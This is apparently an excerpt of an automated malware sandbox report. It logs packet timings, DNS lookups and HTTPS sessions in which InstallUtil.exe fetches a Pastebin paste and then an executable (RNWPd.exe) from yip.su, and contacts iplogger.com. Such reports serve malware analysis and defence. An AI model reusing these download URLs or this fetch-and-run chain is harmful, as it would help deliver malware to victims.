                                                Aug 9, 2024 23:01:55.009272099 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:55.009573936 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:59.406830072 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:59.406919003 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:59.407162905 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:59.407593966 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:59.407632113 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:59.876869917 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:59.879887104 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:59.879951954 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.003840923 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.003987074 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.004064083 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.004362106 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:00.004427910 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.004533052 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:00.004960060 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.005218029 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.005292892 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:00.005681038 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:00.022212982 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.022249937 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.022346973 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.022583961 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.022592068 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.614370108 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.616087914 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.616105080 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854552031 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854615927 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854657888 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854703903 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854717016 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.854732990 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854760885 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.854782104 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854830980 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854871988 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.854882002 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854923010 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.854931116 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854943991 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.854989052 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.855894089 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:05.141285896 CEST49749443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:05.141323090 CEST44349749172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:05.141406059 CEST49749443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:05.141690016 CEST49749443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:05.141707897 CEST44349749172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:05.619554043 CEST44349749172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:05.621740103 CEST49749443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:05.621759892 CEST44349749172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:05.767247915 CEST44349749172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:05.767378092 CEST44349749172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:05.767465115 CEST44349749172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:05.767549038 CEST44349749172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:05.767611027 CEST49749443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:05.767627954 CEST44349749172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:05.767751932 CEST44349749172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:05.767817020 CEST49749443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:05.768198967 CEST49749443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:05.804466009 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:05.804521084 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:05.804606915 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:05.804930925 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:05.804948092 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.283023119 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.287727118 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:06.287749052 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.555501938 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.555571079 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.555612087 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.555651903 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.555671930 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:06.555686951 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.555731058 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.555732965 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:06.555773973 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.555775881 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:06.555799007 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.555929899 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:06.555941105 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.556035042 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.556394100 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:06.556406975 CEST44349750188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:06.556423903 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:06.556454897 CEST49750443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:10.938368082 CEST49751443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:10.938395977 CEST44349751172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:10.938517094 CEST49751443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:10.938772917 CEST49751443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:10.938788891 CEST44349751172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:11.402133942 CEST44349751172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:11.404109955 CEST49751443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:11.404131889 CEST44349751172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:11.518301964 CEST44349751172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:11.518435001 CEST44349751172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:11.518487930 CEST49751443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:11.518500090 CEST44349751172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:11.518596888 CEST44349751172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:11.518681049 CEST49751443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:11.518686056 CEST44349751172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:11.518789053 CEST44349751172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:11.518850088 CEST49751443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:11.519218922 CEST49751443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:11.538305044 CEST49752443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:11.538345098 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:11.538781881 CEST49752443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:11.538781881 CEST49752443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:11.538825989 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.016896009 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.045058966 CEST49752443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:12.045072079 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.250238895 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.250292063 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.250334024 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.250364065 CEST49752443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:12.250374079 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.250387907 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.250443935 CEST49752443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:12.251169920 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.251207113 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.251235008 CEST49752443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:12.251247883 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.251315117 CEST44349752188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:12.251394987 CEST49752443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:12.251394987 CEST49752443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:12.251796961 CEST49752443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:16.656441927 CEST49753443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:16.656487942 CEST44349753172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:16.656578064 CEST49753443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:16.656908989 CEST49753443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:16.656927109 CEST44349753172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:17.127821922 CEST44349753172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:17.130824089 CEST49753443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:17.130840063 CEST44349753172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:17.275160074 CEST44349753172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:17.275284052 CEST44349753172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:17.275337934 CEST49753443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:17.275356054 CEST44349753172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:17.275443077 CEST44349753172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:17.275504112 CEST49753443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:17.275511980 CEST44349753172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:17.275630951 CEST44349753172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:17.275692940 CEST49753443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:17.276096106 CEST49753443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:17.296720982 CEST49754443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:17.296761036 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:17.296833038 CEST49754443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:17.297099113 CEST49754443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:17.297110081 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:17.903621912 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:17.910645962 CEST49754443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:17.910666943 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.045468092 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.045619011 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.045671940 CEST49754443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:18.045689106 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.045785904 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.045872927 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.045936108 CEST49754443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:18.045944929 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.046039104 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.046096087 CEST49754443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:18.046103001 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.046160936 CEST49754443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:18.046179056 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.046305895 CEST44349754188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:18.046365976 CEST49754443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:18.054223061 CEST49754443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:22.406577110 CEST49755443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:22.406599045 CEST44349755172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:22.406929016 CEST49755443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:22.407228947 CEST49755443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:22.407243967 CEST44349755172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:22.889147043 CEST44349755172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:22.891628027 CEST49755443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:22.891644955 CEST44349755172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:23.021106958 CEST44349755172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:23.021167040 CEST44349755172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:23.021234989 CEST44349755172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:23.021270990 CEST44349755172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:23.021323919 CEST49755443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:23.021342039 CEST44349755172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:23.021356106 CEST44349755172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:23.021374941 CEST49755443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:23.021475077 CEST49755443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:23.022047997 CEST49755443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:23.131951094 CEST49756443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:23.131989956 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:23.132059097 CEST49756443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:23.134130001 CEST49756443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:23.134145975 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:23.615622997 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:23.655155897 CEST49756443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:24.368506908 CEST49756443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:24.368540049 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:24.581317902 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:24.581453085 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:24.581558943 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:24.581679106 CEST49756443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:24.581696033 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:24.581804991 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:24.581830978 CEST49756443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:24.581840992 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:24.581955910 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:24.582164049 CEST44349756188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:24.582174063 CEST49756443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:24.582437992 CEST49756443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:24.586442947 CEST49756443192.168.2.6188.114.96.3

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 9, 2024 23:00:52.584353924 CEST6345053192.168.2.61.1.1.1
                                                Aug 9, 2024 23:00:52.592073917 CEST53634501.1.1.1192.168.2.6
                                                Aug 9, 2024 23:00:53.401336908 CEST6391753192.168.2.61.1.1.1
                                                Aug 9, 2024 23:00:53.412178040 CEST53639171.1.1.1192.168.2.6
                                                Aug 9, 2024 23:00:58.405965090 CEST6078953192.168.2.61.1.1.1
                                                Aug 9, 2024 23:00:58.416543007 CEST53607891.1.1.1192.168.2.6

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Aug 9, 2024 23:00:52.584353924 CEST192.168.2.61.1.1.10x2aafStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                Aug 9, 2024 23:00:53.401336908 CEST192.168.2.61.1.1.10x542fStandard query (0)yip.suA (IP address)IN (0x0001)false
                                                Aug 9, 2024 23:00:58.405965090 CEST192.168.2.61.1.1.10xe83dStandard query (0)iplogger.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Aug 9, 2024 23:00:52.592073917 CEST1.1.1.1192.168.2.60x2aafNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                Aug 9, 2024 23:00:52.592073917 CEST1.1.1.1192.168.2.60x2aafNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                Aug 9, 2024 23:00:52.592073917 CEST1.1.1.1192.168.2.60x2aafNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                Aug 9, 2024 23:00:53.412178040 CEST1.1.1.1192.168.2.60x542fNo error (0)yip.su188.114.96.3A (IP address)IN (0x0001)false
                                                Aug 9, 2024 23:00:53.412178040 CEST1.1.1.1192.168.2.60x542fNo error (0)yip.su188.114.97.3A (IP address)IN (0x0001)false
                                                Aug 9, 2024 23:00:58.416543007 CEST1.1.1.1192.168.2.60xe83dNo error (0)iplogger.com172.67.188.178A (IP address)IN (0x0001)false
                                                Aug 9, 2024 23:00:58.416543007 CEST1.1.1.1192.168.2.60xe83dNo error (0)iplogger.com104.21.76.57A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • pastebin.com
                                                • yip.su
                                                • iplogger.com

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649721172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:00:53 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:00:53 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:00:53 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aada0a95043a6-EWR
                                                2024-08-09 21:00:53 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:00:53 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:00:53 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:00:53 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:00:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.649722188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:00:53 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:00:54 UTC906INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:00:54 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:00:54 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:00:54 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B0SJpbrQOjHIiis0Uaa5o2Fg12o74c%2FLav%2FiY4XbJXIjArAujGMtBT%2FTZIFPxqX7dNHcBnwdvVZZChN%2Fu7RBK6oiAnHoirHiqePvLF1dkXxwRx%2FAhLol74I%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aada54b8972b6-EWR
                                                alt-svc: h3=":443"; ma=86400
